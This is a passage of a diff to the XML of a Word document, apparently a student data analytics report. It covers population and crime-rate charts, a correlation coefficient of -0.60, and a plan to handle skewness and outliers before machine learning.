-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-        <w:t>To compare the evolution of the population and crime rate, a line chart has been plotted.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30E0C022" wp14:editId="6A39FD3D">
-            <wp:extent cx="6120130" cy="1866265"/>
-            <wp:effectExtent l="0" t="0" r="0" b="635"/>
-            <wp:docPr id="1172884538" name="Picture 1" descr="A graph of a graph and a graph of a graph&#10;&#10;Description automatically generated"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1172884538" name="Picture 1" descr="A graph of a graph and a graph of a graph&#10;&#10;Description automatically generated"/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId23"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="6120130" cy="1866265"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-        <w:t xml:space="preserve">Figure 08 – Line Chart comparing crime rate and population </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-        <w:t>growth</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Insight</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:t>The overall trend in the dataset shows that both population and crime have increased over time. However, the crime rate has increased at a slower rate than the population. This means that the crime rate per capita has decreased over time.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Correlation</w:t>
+      </w:pPr>
+      <w:r>
+        <w:t>To get a better understanding of the relationship between population growth and crime rate, we can calculate the correlation coefficient between the two variables.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10993,751 +10883,37 @@
         <w:spacing w:line="288" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>To get a better understanding of the relationship between population growth and crime rate, we can calculate the correlation coefficient between the two variables.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EBB4EC8" wp14:editId="57047AEB">
-            <wp:extent cx="5373773" cy="914400"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="1527942968" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1527942968" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId24"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5398924" cy="918680"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Heatmap</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
           <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
           <w:i/>
           <w:iCs/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
           <w:lang w:val="en-IE"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09FD23D1" wp14:editId="39864ABC">
-            <wp:extent cx="3571875" cy="2056885"/>
-            <wp:effectExtent l="0" t="0" r="0" b="635"/>
-            <wp:docPr id="1172744034" name="Picture 1" descr="A black and white squares with white text&#10;&#10;Description automatically generated"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1172744034" name="Picture 1" descr="A black and white squares with white text&#10;&#10;Description automatically generated"/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId25"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="3584174" cy="2063967"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
           <w:i/>
           <w:iCs/>
+          <w:noProof/>
           <w:lang w:val="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Figure 08 – Heatmap correlation coefficient </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-        <w:t>popularion</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and crime</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-        <w:t>Insight</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-        <w:t>The correlation coefficient for the population growth and crime rate dataset is -0.602567. This indicates a moderate negative correlation between the two variables. This means that as the population increases, the crime rate tends to decrease.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading"/>
-        <w:spacing w:line="240" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc59959352"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">3.0 </w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="5"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-        </w:rPr>
-        <w:t>Machine Learning for Data Analysis</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-        <w:t>For the purpose of</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> developing a machine learning model, I will utilize the new generated dataset, Pop_and_crime_df.csv. To prepare the data for Machine Learning, I will standardize the crime rate providing the crime rate per 100,000 people, which is a common way to standardize crime rates for comparison.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">These tasks will be performed in the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-        <w:t>jupyter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> notebook: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>MSC_DA_CA1_Jose_Mario</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>.ipynb</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-        <w:t>Phase 4 - Machine Learning</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Handling with Outliers</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>and</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Skewness</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:t>In the Machine Learning phase, it is crucial to address skewness, handle outliers, and standardize the data.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">To identify potential outliers, statistical methods like the Z-score or the Interquartile Range (IQR) can be employed. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Considering that this dataset is highly skewed, the IQR method is the more appropriate choice for identifying potential outliers.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:t>After applying the IQR method, we have a table with the rows with outliers:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69796BBB" wp14:editId="7226DC11">
-            <wp:extent cx="4819287" cy="2941175"/>
-            <wp:effectExtent l="0" t="0" r="635" b="0"/>
-            <wp:docPr id="1036213183" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1036213183" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated"/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId26"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="4827838" cy="2946394"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
         </w:rPr>
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
-              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3F811877" wp14:editId="379867C2">
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251679744" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4A5DC8E0" wp14:editId="567CDF2D">
                 <wp:simplePos x="0" y="0"/>
                 <wp:positionH relativeFrom="column">
-                  <wp:posOffset>3095513</wp:posOffset>
+                  <wp:posOffset>3213418</wp:posOffset>
                 </wp:positionH>
                 <wp:positionV relativeFrom="paragraph">
-                  <wp:posOffset>1212177</wp:posOffset>
+                  <wp:posOffset>104775</wp:posOffset>
                 </wp:positionV>
-                <wp:extent cx="2578100" cy="2368550"/>
-                <wp:effectExtent l="0" t="0" r="12700" b="12700"/>
-                <wp:wrapNone/>
-                <wp:docPr id="166474852" name="Text Box 1"/>
-                <wp:cNvGraphicFramePr/>
-                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
-                    <wps:wsp>
-                      <wps:cNvSpPr txBox="1"/>
-                      <wps:spPr>
-                        <a:xfrm>
-                          <a:off x="0" y="0"/>
-                          <a:ext cx="2578100" cy="2368550"/>
-                        </a:xfrm>
-                        <a:prstGeom prst="rect">
-                          <a:avLst/>
-                        </a:prstGeom>
-                        <a:solidFill>
-                          <a:schemeClr val="lt1"/>
-                        </a:solidFill>
-                        <a:ln w="6350">
-                          <a:solidFill>
-                            <a:prstClr val="black"/>
-                          </a:solidFill>
-                        </a:ln>
-                      </wps:spPr>
-                      <wps:txbx>
-                        <w:txbxContent>
-                          <w:p>
-                            <w:pPr>
-                              <w:pStyle w:val="BodyA"/>
-                              <w:jc w:val="center"/>
-                              <w:rPr>
-                                <w:b/>
-                                <w:bCs/>
-                              </w:rPr>
-                            </w:pPr>
-                            <w:r>
-                              <w:rPr>
-                                <w:b/>
-                                <w:bCs/>
-                              </w:rPr>
-                              <w:t>Skewness vs outliers:</w:t>
-                            </w:r>
-                          </w:p>
-                          <w:p>
-                            <w:pPr>
-                              <w:jc w:val="both"/>
-                            </w:pPr>
-                            <w:r>
-                              <w:t>As a result, we have 19 skewed columns, with some right skewness and others left skewness.</w:t>
-                            </w:r>
-                            <w:r>
-                              <w:t xml:space="preserve"> Also, we can observe that there are 15 </w:t>
-                            </w:r>
-                            <w:proofErr w:type="spellStart"/>
-                            <w:r>
-                              <w:t>rowns</w:t>
-                            </w:r>
-                            <w:proofErr w:type="spellEnd"/>
-                            <w:r>
-                              <w:t xml:space="preserve"> with outliers.</w:t>
-                            </w:r>
-                          </w:p>
-                          <w:p>
-                            <w:pPr>
-                              <w:jc w:val="both"/>
-                              <w:rPr>
-                                <w:lang w:val="en-US"/>
-                              </w:rPr>
-                            </w:pPr>
-                            <w:r>
-                              <w:t xml:space="preserve">Considering that the </w:t>
-                            </w:r>
-                            <w:proofErr w:type="spellStart"/>
-                            <w:r>
-                              <w:t>dataframe</w:t>
-                            </w:r>
-                            <w:proofErr w:type="spellEnd"/>
-                            <w:r>
-                              <w:t xml:space="preserve"> contains 21 rows, removing outliers would eliminat</w:t>
-                            </w:r>
-                            <w:r>
-                              <w:t>e</w:t>
-                            </w:r>
-                            <w:r>
-                              <w:t xml:space="preserve"> 15 rows. In this scenario, the preferred approach is </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:t>transform</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:t xml:space="preserve"> the data to mitigate skewness rather than removing outliers.</w:t>
-                            </w:r>
-                          </w:p>
-                        </w:txbxContent>
-                      </wps:txbx>
